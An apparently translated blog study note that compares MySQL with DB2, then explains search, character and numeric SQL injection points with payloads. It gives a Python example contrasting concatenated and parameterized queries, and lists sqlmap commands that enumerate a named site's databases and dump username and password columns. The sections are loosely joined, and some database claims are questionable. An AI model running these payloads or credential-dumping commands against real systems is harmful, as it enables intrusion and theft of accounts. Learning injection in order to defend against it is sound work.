Article from: https://www.cnblogs.com/genius-sen/p/9064579.html

Study the principle of buffer overflow, at least for two kinds of databases.

MySQL compared with DB2

  • Account management
    MySQL's account management is similar to Oracle's: accounts are managed by MySQL itself and stored in the user table of the mysql database. An account is composed of IP address + user name. DB2 has no user system of its own; its authentication depends entirely on operating system accounts.

  • Permission management
    MySQL's permission management works the same way as DB2's: it can authorize individual objects and achieve fine-grained authorization. The difference is that MySQL does better on account security. Because its accounts are made up of user name plus IP address, authentication must verify both the login IP and the user name at the same time, while DB2 only authenticates the connecting account. Another advantage of MySQL is that objects of the smallest unit can be authorized in batches; DB2 cannot do this and is relatively cumbersome, which is one of the places where DB2 needs to improve.

  • Log management
    MySQL uses log double write to ensure the integrity and recoverability of data, and MySQL's transaction log and archive log are two independent objects with no causal relationship between them. In DB2, the archive log is generated from the transaction log. As a result, MySQL's performance on UDI operations is a little worse than DB2's.

  • Lock management
    MySQL uses the MVCC model to implement concurrency control for locks, while DB2 uses a memory model. In concurrent processing and in handling resource conflicts and lock conflicts, MySQL performs better than DB2.

  • Schema management
    Strictly speaking, MySQL has no concept of schema; each schema is equivalent to an independent database. DB2 can create more than one schema within one database. This is a deficiency of MySQL's schema handling and an area that needs improvement.

  • Tablespace management
    MySQL has had the concept of tablespace only since 5.6, and its way of using tablespaces differs greatly from that of enterprise databases. MySQL is relatively weak in tablespaces, with many limitations, and has weaknesses in striping and space management. DB2 does these things very well and is powerful and easy to maintain. These are areas where MySQL needs to learn from enterprise databases.

  • Transaction handling behavior
    By default, when an error occurs in a transaction-related operation, MySQL rolls back only the state of the failing statement. The whole transaction is not actually finished (committed or rolled back); it is up to the application to commit or roll back the entire transaction when it detects the error. DB2, by contrast, rolls back the entire transaction after a lock timeout or other problem causes an exception, rather than rolling back to the last savepoint. This deserves special attention.

This is a special type of injection. It mainly arises when the search parameters are not filtered during a data search. Typically the link address contains "keyword=keywords"; in some cases the parameter is not shown in the link address but is submitted directly through a search box form.
The SQL statement submitted by this kind of injection point is roughly: select * from Table name where field like '%key%'
When we submit the injection parameter keyword=' and [query condition] and '%'=', the SQL statement submitted to the database is:
select * from Table name where field like '%' and [query condition] and '%'='%'

Character injection point

In a link such as http://****?Class=date, the injection parameter is a "character" value, so this is called a character injection point.

The SQL statement submitted by this kind of injection point is roughly: select * from Table name where field = 'date'

When we submit the injection parameter as http://****?Class=date And [query condition], the complete SQL statement submitted to the database is: select * from Table name where field = 'date' and [query condition]

Numeric injection point

In a link such as http://****?ID=55, the injection parameter is a number, so this is called a "numeric injection point".

The SQL statement submitted by this kind of injection point is roughly: select * from Table name where field = 55

When we submit the injection parameter as http://****?ID=55 And [query condition], the complete SQL statement submitted to the database is: select * from Table name where field = 55 And [query condition]
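
The three injection points above, shown next to their parameterized counterparts. This is an added example, not code from the original article; it uses Python's sqlite3 so it runs offline, and the table, column names and sample rows are constructed for the illustration.

```python
import sqlite3

def make_db():
    # Constructed sample data; table and column names are assumptions.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, class TEXT, title TEXT)")
    db.executemany("INSERT INTO articles VALUES (?, ?, ?)", [
        (55, "date", "release notes"),
        (56, "news", "100% uptime report"),
        (57, "news", "draft"),
    ])
    return db

def ids(db, sql, args=()):
    return sorted(row[0] for row in db.execute(sql, args))

# --- Vulnerable: user input is concatenated into the statement text ---
def search_concat(db, keyword):      # search-type point, inside '%...%'
    return ids(db, "SELECT id FROM articles WHERE title LIKE '%" + keyword + "%'")

def class_concat(db, cls):           # character-type point, inside quotes
    return ids(db, "SELECT id FROM articles WHERE class = '" + cls + "'")

def id_concat(db, raw_id):           # numeric-type point, unquoted
    return ids(db, "SELECT id FROM articles WHERE id = " + raw_id)

# --- Hardened: statement text is fixed, input travels as a bound value ---
def escape_like(text, esc="\\"):
    # % and _ are LIKE wildcards; binding alone does not neutralise them.
    for ch in (esc, "%", "_"):
        text = text.replace(ch, esc + ch)
    return text

def search_bound(db, keyword):
    sql = "SELECT id FROM articles WHERE title LIKE ? ESCAPE '\\'"
    return ids(db, sql, ("%" + escape_like(keyword) + "%",))

def class_bound(db, cls):
    return ids(db, "SELECT id FROM articles WHERE class = ?", (cls,))

def id_bound(db, raw_id):
    # Check the type before binding; anything but decimal digits is rejected.
    if not (raw_id.isascii() and raw_id.isdigit()):
        raise ValueError("id must be a decimal integer")
    return ids(db, "SELECT id FROM articles WHERE id = ?", (int(raw_id),))

if __name__ == "__main__":
    db = make_db()
    payload = "' and 1=1 and '%'='"   # the article's search payload, 1=1 as the condition
    print(search_concat(db, payload), search_bound(db, payload))
```

With concatenation the appended condition is evaluated by the database; with binding the same input is only ever compared as a literal string, and a search for "%" matches just the one title that contains a percent sign.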

sqlmap


sqlmap supports five different injection modes:

  • Boolean-based blind injection: whether the injected condition is true or false is determined from the returned page.
  • Time-based blind injection: no information can be judged from the page content, so a conditional statement is used to check whether a time delay statement was executed (that is, whether the page's response time increased).
  • Error-based injection: the page returns error information, or the result of the injected statement is returned directly in the page.
  • UNION query injection: injection that can be used when union is available.
  • Stacked queries injection: injection that can execute multiple statements at the same time.

Some sqlmap commands

sqlmap -u "http://www.vuln.cn/post.php?id=1" --dbms mysql --level 3 --dbs

Query which databases exist.

sqlmap -u "http://www.vuln.cn/post.php?id=1" --dbms mysql --level 3 -D test --tables

Query the tables in the test database.

sqlmap -u "http://www.vuln.cn/post.php?id=1" --dbms mysql --level 3 -D test -T admin --columns

Query which fields the admin table in the test database has.

sqlmap -u "http://www.vuln.cn/post.php?id=1" --dbms mysql --level 3 -D test -T admin -C "username,password" --dump

Dump the data in the username and password fields.

SQL Power Injector
